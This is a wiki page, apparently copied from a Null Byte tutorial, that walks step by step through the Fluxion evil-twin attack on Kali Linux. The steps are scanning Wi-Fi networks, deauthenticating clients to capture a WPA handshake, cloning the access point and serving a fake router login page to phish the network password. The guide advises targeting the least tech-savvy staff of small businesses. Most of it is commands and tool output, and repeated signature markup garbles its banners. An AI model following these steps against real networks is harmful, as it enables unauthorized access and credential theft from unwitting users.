Difference between revisions of "Kali Linux: Fluxion Attack"
Onnowpurbo (talk | contribs) (Created page with "Sumber: https://null-byte.wonderhowto.com/how-to/hack-wi-fi-capturing-wpa-passwords-by-targeting-users-with-fluxion-attack-0176134/ With tools such as Reaver becoming less vi...") |
Onnowpurbo (talk | contribs) |
||
| Line 42: | Line 42: | ||
The developer of Fluxion shut down the product recently, but you can get an older version of it to use still. To get the older version of Fluxion running on your Kali Linux system, clone the Git repository with: | The developer of Fluxion shut down the product recently, but you can get an older version of it to use still. To get the older version of Fluxion running on your Kali Linux system, clone the Git repository with: | ||
| − | ~# git clone https://github.com/wi-fi-analyzer/fluxion | + | ~# git clone https://github.com/wi-fi-analyzer/fluxion |
| − | Cloning into 'fluxion'... | + | Cloning into 'fluxion'... |
| − | remote: Enumerating objects: 2646, done. | + | remote: Enumerating objects: 2646, done. |
| − | remote: Total 2646 (delta 0), reused 0 (delta 0), pack-reused 2646 | + | remote: Total 2646 (delta 0), reused 0 (delta 0), pack-reused 2646 |
| − | Receiving objects: 100% (2646/2646), 26.14 MiB | 83.00 KiB/s, done. | + | Receiving objects: 100% (2646/2646), 26.14 MiB | 83.00 KiB/s, done. |
| − | Resolving deltas: 100% (1433/1433), done. | + | Resolving deltas: 100% (1433/1433), done. |
| − | Check for missing dependencies by navigating to the folder, then list the contents to see what's in it. | + | Check for missing dependencies by navigating to the folder, then list the contents to see what's in it. |
| − | ~# cd fluxion | + | ~# cd fluxion |
| − | ~/fluxion# ls | + | ~/fluxion# ls |
| + | |||
| + | docs install lib logos siteinstaller.py | ||
| + | fluxion.sh language locale README.md sites | ||
| − | |||
| − | |||
Next, start it up for the first time with ./fluxion.sh (if not root, use sudo ./fluxion.sh). You'll likely see the following, where some dependencies will be needed. | Next, start it up for the first time with ./fluxion.sh (if not root, use sudo ./fluxion.sh). You'll likely see the following, where some dependencies will be needed. | ||
| − | ~/fluxion# ./fluxion.sh | + | ~/fluxion# ./fluxion.sh |
[15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)[[User:Onnowpurbo|onnowpurbo]] ([[User talk:Onnowpurbo|talk]]) 15:56, 3 October 2020 (+07)] | [15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)[[User:Onnowpurbo|onnowpurbo]] ([[User talk:Onnowpurbo|talk]]) 15:56, 3 October 2020 (+07)] | ||
| Line 66: | Line 67: | ||
[15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)[[User:Onnowpurbo|onnowpurbo]] ([[User talk:Onnowpurbo|talk]]) 15:56, 3 October 2020 (+07)] | [15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)[[User:Onnowpurbo|onnowpurbo]] ([[User talk:Onnowpurbo|talk]]) 15:56, 3 October 2020 (+07)] | ||
| − | aircrack-ng.....OK! | + | aircrack-ng.....OK! |
| − | aireplay-ng.....OK! | + | aireplay-ng.....OK! |
| − | airmon-ng.......OK! | + | airmon-ng.......OK! |
| − | airodump-ng.....OK! | + | airodump-ng.....OK! |
| − | awk.............OK! | + | awk.............OK! |
| − | curl............OK! | + | curl............OK! |
| − | dhcpd...........Not installed (isc-dhcp-server) | + | dhcpd...........Not installed (isc-dhcp-server) |
| − | hostapd.........OK! | + | hostapd.........OK! |
| − | iwconfig........OK! | + | iwconfig........OK! |
| − | lighttpd........Not installed | + | lighttpd........Not installed |
| − | macchanger......OK! | + | macchanger......OK! |
| − | mdk3............OK! | + | mdk3............OK! |
| − | nmap............OK! | + | nmap............OK! |
| − | php-cgi.........Not installed | + | php-cgi.........Not installed |
| − | pyrit...........OK! | + | pyrit...........OK! |
| − | python..........OK! | + | python..........OK! |
| − | unzip...........OK! | + | unzip...........OK! |
| − | xterm...........OK! | + | xterm...........OK! |
| − | openssl.........OK! | + | openssl.........OK! |
| − | rfkill..........OK! | + | rfkill..........OK! |
| − | strings.........OK! | + | strings.........OK! |
| − | fuser...........OK! | + | fuser...........OK! |
| + | |||
| + | |||
To fetch dependencies needed and set your board to green, install the missing ones from the list. In my case, it's dhcpd, lighttpd, and php-cgi. | To fetch dependencies needed and set your board to green, install the missing ones from the list. In my case, it's dhcpd, lighttpd, and php-cgi. | ||
Latest revision as of 20:41, 26 August 2021
With tools such as Reaver becoming less viable options for pen-testers as ISPs replace vulnerable routers, there become fewer certainties about which tools will work against a particular target. If you don't have time to crack the WPA password or it's unusually strong, it can be hard to figure out your next step. Luckily, nearly all systems have one common vulnerability you can count on — users!
Social engineering goes beyond hardware and attacks the most vulnerable part of any system, and one tool that makes it super easy is Fluxion. Even the most antisocial hacker can hide behind a well-crafted login page, and Fluxion automates the process of creating a fake access point to capture WPA passwords.
Picking the Weakest Links to Attack
Users are almost always the weakest link of a system, and so attacks against them are often preferred because they are cheap and effective. Hardware concerns can often be ignored if the users are sufficiently inexperienced with technology to fall for a social engineering attack. While social engineering attacks may raise flags within more tech-savvy organizations, phishing and spoofing attacks against users are the tool of first choice for both nation states and criminal hackers.
One of the most vulnerable targets to this kind of attack is a small- or medium-sized business focused on an industry other than technology. These businesses usually have many vulnerable or unpatched systems with default credentials that are easy to exploit over their wireless network and are not likely to know what an attack looks like.
How Fluxion Works Its Magic Fluxion is the future — a blend of technical and social engineering automation that tricks a user into handing over the Wi-Fi password in a matter of keystrokes. Specifically, it's a social engineering framework using an evil twin access point (AP), integrated jamming, and handshake capture functions to ignore hardware and focus on the "wetware." Tools such as Wifiphisher execute similar attacks but cannot verify the WPA passwords supplied.
Don't Miss: Create an Evil Twin Wireless AP to Eavesdrop on Data
Image by Kody/Null Byte Fluxion evolved from an advanced social engineering attack named Lindset, where the first tool was written mostly in Spanish and suffered from several bugs. Fluxion is a rewritten attack to trick inexperienced users into divulging the password/passphrase of the network.
Fluxion is a unique tool in its use of a WPA handshake to not only control the behavior of the login page but the behavior of the entire script. It jams the original network and creates a clone with the same name, enticing the disconnected user to join. It presents a fake login page indicating the router needs to restart or load firmware and requests the network password to proceed. Simple as that.
The tool uses a captured handshake to check the password entered and continues to jam the target AP until the correct password is entered. Fluxion uses Aircrack-ng to verify the results live as they are entered, and a successful outcome means the password is ours.
Don't Miss: Cracking WPA2-PSK Passwords Using Aircrack-Ng
Checking WPA password capture confirming through Aircrack-ng. Image by Kody/Null Byte Tactically, the attack is only as good as the fake login screen. Many have been added to Fluxion since it was created, and it's possible to develop other screens with some research. In general, running the attack with default login screens will immediately call attention from a more experienced user or tech-savvy organization. The attack is most effective when targeted at whoever is the oldest or least tech-savvy in an organization. Sensitive APs with intrusion detection systems may detect and attempt to defend against the attack by blocking your IP in response to the integrated jamming.
System Compatibility & Requirements Fluxion works on Kali Linux. Just make sure that you are fully updated or that you're running Kali Rolling to ensure the system and dependencies are current. You may run it on your dedicated Kali install in a virtual machine. If you're looking for a cheap, handy platform to get started on, check out our Kali Linux Raspberry Pi build using the Raspberry Pi 3 or Raspberry Pi 4. The tool will not work over SSH since it relies on opening other windows.
Don't Miss: Set Up a Headless Raspberry Pi with Kali Linux For it to work, we'll need to use a compatible wireless network adapter. Check out our list of Kali Linux compatible wireless network adapters or just grab our most popular adapter for beginners. Make sure that your wireless adapter capable of monitor mode is plugged in and recognized by Kali and seen when iwconfig or ifconfig is entered.
Don't Miss: Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019 How to Capture WPA Passwords with Fluxion Our goal in this article will be to target an organization via its WPA encrypted Wi-Fi connection. We will launch an attack against users attached to the access point "Probe," capture a handshake, set up a cloned (evil twin) AP, jam the target AP, set up a fake login page, and confirm the captured password against the handshake.
Step 1Install Fluxion The developer of Fluxion shut down the product recently, but you can get an older version of it to use still. To get the older version of Fluxion running on your Kali Linux system, clone the Git repository with:
~# git clone https://github.com/wi-fi-analyzer/fluxion
Cloning into 'fluxion'... remote: Enumerating objects: 2646, done. remote: Total 2646 (delta 0), reused 0 (delta 0), pack-reused 2646 Receiving objects: 100% (2646/2646), 26.14 MiB | 83.00 KiB/s, done. Resolving deltas: 100% (1433/1433), done. Check for missing dependencies by navigating to the folder, then list the contents to see what's in it.
~# cd fluxion ~/fluxion# ls
docs install lib logos siteinstaller.py fluxion.sh language locale README.md sites
Next, start it up for the first time with ./fluxion.sh (if not root, use sudo ./fluxion.sh). You'll likely see the following, where some dependencies will be needed.
~/fluxion# ./fluxion.sh
[15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)] [ ] [ FLUXION 2 < Fluxion Is The Future > ] [ ] [15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)]
aircrack-ng.....OK! aireplay-ng.....OK! airmon-ng.......OK! airodump-ng.....OK! awk.............OK! curl............OK! dhcpd...........Not installed (isc-dhcp-server) hostapd.........OK! iwconfig........OK! lighttpd........Not installed macchanger......OK! mdk3............OK! nmap............OK! php-cgi.........Not installed pyrit...........OK! python..........OK! unzip...........OK! xterm...........OK! openssl.........OK! rfkill..........OK! strings.........OK! fuser...........OK!
To fetch dependencies needed and set your board to green, install the missing ones from the list. In my case, it's dhcpd, lighttpd, and php-cgi.
~/fluxion# apt install dhcpd lighttpd php-cgi For dhcpd, if it installs udhcpd instead, run the following command to get the right one.
~/fluxion# apt install isc-dhcp-server After all the dependencies are met, the board is green, and you can proceed to the attack interface. Run the Fluxion command again with ./fluxion.sh (or sudo ./fluxion.sh) to get hacking.
~/fluxion# ./fluxion.sh
[15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)] [ ] [ FLUXION 2 < Fluxion Is The Future > ] [ ] [15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)]
[2] Select your language
[1] English
[2] German
[3] Romanian
[4] Turkish
[5] Spanish
[6] Chinese
[7] Italian
[8] Czech
[9] Greek
[10] French
[11] Slovenian
[deltaxflux@fluxion]-[~] 1 Step 2Scan Wi-Fi Hotspots The first option is to select the language. Do so by typing the number next to the one you want and press Enter to proceed to the interface selector. Here, you'll see all of your connected network interfaces. Choose the number next to the one that you want, in my case, 1 for wlan2.
[15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)] [ ] [ FLUXION 2 < Fluxion Is The Future > ] [ ] [15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)]
Select an interface
[1] wlan2 Atheros AR9271 ath9k
[2] wlan1 Ralink RT2870/3070 rt2800usb
[3] wlan0 Atheros AR9565 ath9k
[deltaxflux@fluxion]-[~] 1 That will take you to the target identification stage. If the channel of the network you wish to attack is known, you may enter 2 to narrow the scan to the desired channel. Otherwise, select 1 to scan all channels.
[15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)] [ ] [ FLUXION 2 < Fluxion Is The Future > ] [ ] [15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)]
[i] Select channel
[1] All channels
[2] Specific channel(s)
[3] Back
[deltaxflux@fluxion]-[~] 1 A WiFi Monitor window will open while it occurs, so allow the scan to collect wireless data for at least 30 seconds. It's essential to let the attack run for at least 30 seconds to verify if a client is connected to the network. Press Control-C or click the window's (x) to stop the capture process whenever you spot the wireless network that you want. After you do so, the window will close and the results will appear back in the terminal.
Step 3Choose Your Target AP Select a target with active clients for the attack to run on by entering the number next to it. Unless you intend to wait for a client to connect (possibly for a long time), the attack will not work on a network without any clients. Without anyone connected to the network, who would we trick into giving us the password?
[15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)] [ ] [ FLUXION 2 < Fluxion Is The Future > ] [ ] [15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)]
WIFI LIST
ID MAC CHAN SECU PWR ESSID [1] BC:F6:85:04:A9:98 9 WPA2 26% ACR North [2] 14:AB:F0:CC:6E:90 4 WPA2 30% cpc-office [3] B4:75:0E:B4:54:DO 1 WPA2 34% JadeMagnolia [4]* E8:AD:A6:55:31:9E 11 WPA 34% [5] E8:ED:05:7A:4D:70 6 WPA2 36% DG1670A72 [6] A4:2B:BO:E9:5B:6D 1 WPA2 34% MEDICO [7] 28:9E:FC:62:7A:E6 1 WPA2 37% MySpectrumWiFie0-2G [8] 84:A0:6E:C6:93:CE 1 WPA2 37% MyspectrumWiFic8-2G [9] 9C:A3:A9:62:7C:E4 14 WPA2 36% NVR9ca3a9627ce4 [10] AC:5D:10:4A:95:2A 11 WPA2 36% ATT304 [11] 8C:A2:FD:00:18:A5 6 WPA2 36% HungryCandy [12] BO:98:2B:4E:62:AE 1 WPA2 36% MySpectrumWiFia8-2G [13] A4:08:F5:70:79:8A 1 WPA2 36% MySpectrumWiFi84-2G [14] A0:39:EE:7E:63:DA 1 WPA2 36% MINDEOK-2G [15] 24:79:2A:93:50:38 7 WPA2 34% TWCWiFi-Passpoint [16] 24:79:2A:13:50:39 7 WPA2 34% SpectrumWiFi Plus [17] 8C:A2:FD:00:05:8E 6 WPA2 37% LavishBest [18] AC:EC:80:09:65:CO 1 WPA2 37% SHIN [19] 00:AC:E0:91:65:80 1 WPA2 39% SMQ 2.4 [20] 1A:91:82:8E:DF:FB 4 WPA2 38% [21] B2:52:16:21:47:E9 4 WPA2 38% DIRECT-6SMFC-L5700DW_BR47e9 [22] 10:05:31:32:BB:30 11 WPA2 39% GoGo Foot [23] EC:0E:C4:73:09:A7 1 WPA2 38% WIFI73C9A4 [24] 20:E5:2A:4D:A6:F2 1 WPA2 38% Netgear 100-2G [25] 98:6B:3D:DF:64:50 6 WPA2 40% Undefined [26] 8C:A2:FD:00:9C:AD 6 WPA2 39% Wittyslim [27] F4:6B:EF:30:0F:OE 1 WPA2 40% PT STOP [28] 38:3B:C8:02:59:66 4 WPA2 38% ATT386 [29] 8C:A2:FD:01:23:28 6 WPA2 40% Donna :) [30] FE:EC:DA:A4:06:40 6 WPA2 40% [31] 84:A0:6E:C2:0A:2E 1 WPA2 41% MyspectrumWiFi28-2G [32] 98:6B:3D:CA:45:70 9 WPA2 42% DG1670A72 [33] 14:91:82:8E:DF:FB 4 WPA2 40% FBISurveillanceTruck [34] AC:E2:03:10:75:8A 5 WPA2 42% DIRECT-89-HP Officejet Pro 6970 [35] OE:A2:FD:01:2B:28 6 WPA2 41% Donna :) _Guest [36] 34:6B:46:40:5A:5A 6 WPA2 42% MySpectrumWiFi54-2G [37] 50:33:8B:68:2D:74 1 WPA2 41% [38] 1C:B9:04:6B:6D:53 3 WPA2 42% island-2B6D50 [39] 8C:A2:FD:00:63:41 6 WPA2 43% Stevefi [40] F4:6B:EF:1E:AA:C6 1 WPA2 43% Happy777-2G [41] 1C:BO:44:CD:34:FO 5 WPA2 44% MySpectrumWiFif2-2G [42] AC:EC:80:A8:F6:FO 6 WPA2 44% TG1672GF2 [43]* 88:DC:96:55:72:00 1 WPA2 47% anchor [44] BO:6E:BF:DB:C1:B8 1 WPA2 45% claire [45] 90:1A:CA:6C:07:00 1 WPA2 47% piccadilly [46]* 40:20:09:2A:64.90 11 WPA2 46% spot 2.4 ghz [47] 60:19:71:EE:A9:20 11 WPA2 45% seoultaxservice [48] OC:EA:C9:77:83:00 11 WPA 46% [49] DO:17:02:B2:06:08 8 WPA2 48% ATI-Guest [50] 60:38:E0:89:F5:02 3 WPA2 47% thlee174 [51] 8C:FE:74:79:E3:73 9 WPA2 46% island-39E370 [52] 40:70:09:74:48:BO 6 WPA2 47% Envy [53] 28:9E:FC:62:5B:26 1 WPA2 48% MySpectrumWiFi20-2G [54] 94:91:7F:25:41:B1 5 WPA2 58% SSooniestyle [55] C4:01:7C:13:10:09 11 WPA2 60% TWCWiFi-Passpoint [56] CC:20:21:38:33:11 10 WPA2 36% DT TUTORING [57] AC:B3:13:07:42:70 11 WPA2 28% Vog Hair Salon-1 [58] 28:9E:FC:67:61:06 11 WPA2 40% MySpectrumWiF100-2G [59] DC:EF:09:CD:30:37 11 WPA2 36% fobdawg_EXT [60] AC:B3:13:7A:4A:90 11 WPA2 38% Gryffindor [61] C4:01:7C:53:10:08 11 WPA2 58% SpectrumWiFi Plus [62] 8C:A2:FD:01:34:46 6 WPA2 35% Chiefrutabaga [63] 8C:A2:FD:00:41:B3 6 WPA2 35% NNND_NET [64] CO:C1:CO:B6:F3:71 6 WPA2 39% SilverHorse [65] 24:F5:A2:2D:F8:09 6 WPA2 36% LALASHOP2.4 [66] 60:72:20:3D:B6:50 6 WPA2 39% MBC NEW MEDIA ROOM [67] 08:02:8E:BB:18:1B -1 WPA2 99%
(*) Active clients
Select target. For rescan type r
[deltaxflux@fluxion]-[~] 46 Step 4Select Your Attack Once you've typed the number of the target network, in my case, 46, press Enter to load the network profile into the attack selector. For demonstration purposes, I'll use option 1 to make a "FakeAP" using Hostapd. It will create a fake hotspot using the captured information to clone the target access point.
[15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)] [ ] [ FLUXION 2 < Fluxion Is The Future > ] [ ] [15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)]
INFO WIFI
SSID = spot 2.4 ghz / WPA2
Channel = 11
Speed = 95 Mbps
BSSID = 40:70:09:7A:64:90 (ARRIS Group, Inc. )
[2] Select Attack Option
[1] FakeAP - Hostapd (Recommended)
[2] FakeAP - airbase-ng (Slower connection)
[3] Bruteforce - (Handshake is required)
[4] Back
[deltaxflux@fluxion]-[~] 1 Step 5Get a Handshake To verify that the password you receive works, you can check it against a captured handshake. If you have a handshake, you can enter it on the next screen. If not, we can press Enter to force the network to provide a handshake in the next step.
handshake location (Example: /root/fluxion.cap) Press ENTER to skip
Path:
[15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)] [ ] [ FLUXION 2 < Fluxion Is The Future > ] [ ] [15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)]
[2] Handshake check
[1] pyrit
[2] aircrack-ng (Miss chance)
[3] Back
[deltaxflux@fluxion]-[~] 2 The screen to check that handshake will appear as seen above. Using the Aircrack-ng method by selecting option 2, Fluxion will send deauthentication packets to the target AP as the client and listen in on the resulting WPA handshake. But first, you need to choose who to deauth, which I'd recommend option 3 so you only deauth the target and not everyone.
[15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)] [ ] [ FLUXION 2 < Fluxion Is The Future > ] [ ] [15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)]
[2] *Capture handshake*
[1] Deauth all
[2] Deauth all [mdk3]
[3] Deauth target
[4] Rescan networks
[5] Exit
[deltaxflux@fluxion]-[~] 3 Two windows will pop up, one for Capturing data on channel and one for Deauthenticating client. In the first window, at the top, look out for the "WPA handshake" to appear. When you see it, as it does in the top right of the screenshot below, you have captured the handshake.
Don't Miss: Cracking WEP Passwords with Aircrack-Ng
Close both of those windows. Back in the terminal, type 1 for "Check handshake," and hit Enter to load the handshake into your attack configuration.
[15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)] [ ] [ FLUXION 2 < Fluxion Is The Future > ] [ ] [15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)]
[2] *Capture handshake*
Status handshake:
[1] Check handshake
[2] Back
[3] Select another network
[4] Exit
#> 1
Now, create an SSL certificate, option 1, so you can create a pop-up without causing alarm and preventing the browser from navigating to it.
[15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)] [ ] [ FLUXION 2 < Fluxion Is The Future > ] [ ] [15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)]
Certification invalid or not present, please choice
[1] Create a SSL certificate
[2] Search for SSl certificate
[3] Exit
#> 1
Step 6Create the Fake Login Page Now it's time to create the fake login page. Select option 1 for "Web Interface" to use the social engineering tool.
[15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)] [ ] [ FLUXION 2 < Fluxion Is The Future > ] [ ] [15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)]
INFO WIFI
SSID = spot 2.4 ghz / WPA2
Channel = 11
Speed = 95 Mbps
BSSID = 40:70:09:7A:64:90 (ARRIS Group, Inc. )
[2] Select your option
[1] Web interface
[2] Bruteforce
[3] Exit
- ? 1
You will be presented with a menu of different fake login pages you can offer to the user. These are customizable with some work but should match the device and language. The defaults should be tested before use, as some are not very convincing. I chose an English language Netgear attack, option 27.
Now for the final step to arm the attack. At this point, you are ready to fire, so press Enter after selecting your language option to launch the attack.
[15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)] [ ] [ FLUXION 2 < Fluxion Is The Future > ] [ ] [15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)15:56, 3 October 2020 (+07)onnowpurbo (talk) 15:56, 3 October 2020 (+07)]
INFO WIFI
SSID = spot 2.4 ghz / WPA2
Channel = 11
Speed = 95 Mbps
BSSID = 40:70:09:7A:64:90 (ARRIS Group, Inc. )
[2] Select Login Page
[1] English [ENG] (NEUTRA)
[2] German [GER] (NEUTRA)
[3] Russian [RUS] (NEUTRA)
[4] Italian [IT] (NEUTRA)
[5] Spanish [ESP] (NEUTRA)
[6] Portuguese [POR] (NEUTRA)
[7] Chinese [CN] (NEUTRA)
[8] French [FR] (NEUTRA)
[9] Turkish [TR] (NEUTRA)
[10] Romanian [RO] (NEUTRA)
[11] Hungarian [HU] (NEUTRA)
[12] Arabic [ARA] (NEUTRA)
[13] Greek [GR] (NEUTRA)
[14] Czech [CZ] (NEUTRA)
[15] Norwegian [NO] (NEUTRA)
[16] Bulgarian [BG] (NEUTRA)
[17] Serbian [SRB] (NEUTRA)
[18] Polish [PL] (NEUTRA)
[19] Indonesian [ID] (NEUTRA)
[20] Dutch [NL]
[21] Danish [DAN]
[22] Hebrew [HE]
[23] Thai [TH]
[24] Portuguese [BR]
